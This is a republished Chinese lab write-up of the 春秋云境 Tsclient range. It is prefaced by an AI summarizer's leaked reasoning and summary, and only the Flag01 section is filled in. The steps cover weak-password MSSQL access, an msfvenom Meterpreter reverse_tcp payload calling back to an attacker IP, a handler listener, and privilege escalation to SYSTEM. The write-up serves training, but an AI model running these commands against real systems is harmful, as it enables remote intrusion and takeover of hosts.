春秋云境 Tsclient
嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。 首先,我需要仔细阅读文章内容。看起来这篇文章主要讲的是一个攻防演练的过程。边界主机IP地址是39.101.143.156,他们通过nmap扫描发现了80端口和1433端口,分别对应IIS和MSSQL服务。然后使用MSF模块尝试弱口令登录成功,用sa:1qaz!QAZ这个密码登录了MSSQL。 接下来,他们使用MDUT工具上传了一个后门,生成的是一个Windows的可执行文件,通过MSF监听器获取了shell权限。然后检查了当前用户的权限,发现有SeImpersonatePrivilege权限,于是尝试提权到system权限。最后找到了flag文件,并获取了第一个flag。 总结一下,整个过程包括扫描、发现服务、弱口令登录、上传后门、获取权限、提权和获取flag。这些都是攻防演练中的典型步骤。 用户可能是一个安全领域的学生或者从业者,想快速了解演练过程的关键点。所以总结的时候要涵盖主要步骤和结果,同时保持简洁。 现在把这些步骤浓缩到一百字以内:nmap扫描发现端口和服务,弱口令登录MSSQL,上传后门获取shell,提权到system权限,并最终获取flag。 这样应该能满足用户的需求了。 </think> 文章描述了一次攻防演练的过程:通过nmap扫描边界主机IP发现80和1433端口(IIS和MSSQL服务),使用弱口令登录MSSQL(sa:1qaz!QAZ),上传后门并运行以获取shell权限。随后通过提权获得system权限,并最终获取flag{3ab2aa01-3405-4877-b052-5672dd8ec3aa}。 2026-1-21 07:57:27 Author: www.freebuf.com(查看原文) 阅读量:0 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

边界主机

  • IP地址:39.101.143.156

整体思路

image

Flag01

  • nmap扫描边界主机IP
    image

  • 发现开启了80端口,访问发现是IIS默认界面,没有网站

  • 开启了1433端口,是MSSQL服务,使用MSF自带的MSSQL模块,尝试弱口令
    image

  • 发现弱口令登录成功:sa:1qaz!QAZ
    image

  • 使用MDUT工具登录
    image

  • 使用MSF生成WIndows后门
    msfvenom -p windows/meterpreter/reverse_tcp lhost=120.27.227.99 lport=3333 -f exe>target1.exe
    image

  • 开启MSF监听器,通过MDUT上传后门并运行,MSF成功获取shell

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 120.22.227.99
    set lport 3333
    exploit
    

    image
    image
    image

  • 查看IP并添加路由
    image
    image

  • 之前有查看当前用户的权限
    image

  • 当前用户拥有SeImpersonatePrivilege权限,可以尝试使用getsystem进行提权,成功获得system权限
    image

  • 查找flag文件,并获取第一个flag:flag{3ab2aa01-3405-4877-b052-5672dd8ec3aa}
    image

Flag02

Flag03

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/defense/467501.html
如有侵权请联系:admin#unsafe.sh